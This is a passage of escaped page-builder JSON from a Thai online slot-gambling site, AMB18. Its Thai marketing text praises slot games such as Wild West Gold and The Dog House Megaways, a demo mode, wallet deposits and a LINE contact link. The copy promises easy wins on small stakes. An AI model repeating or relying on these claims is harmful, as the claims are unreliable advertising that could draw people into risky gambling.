\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> 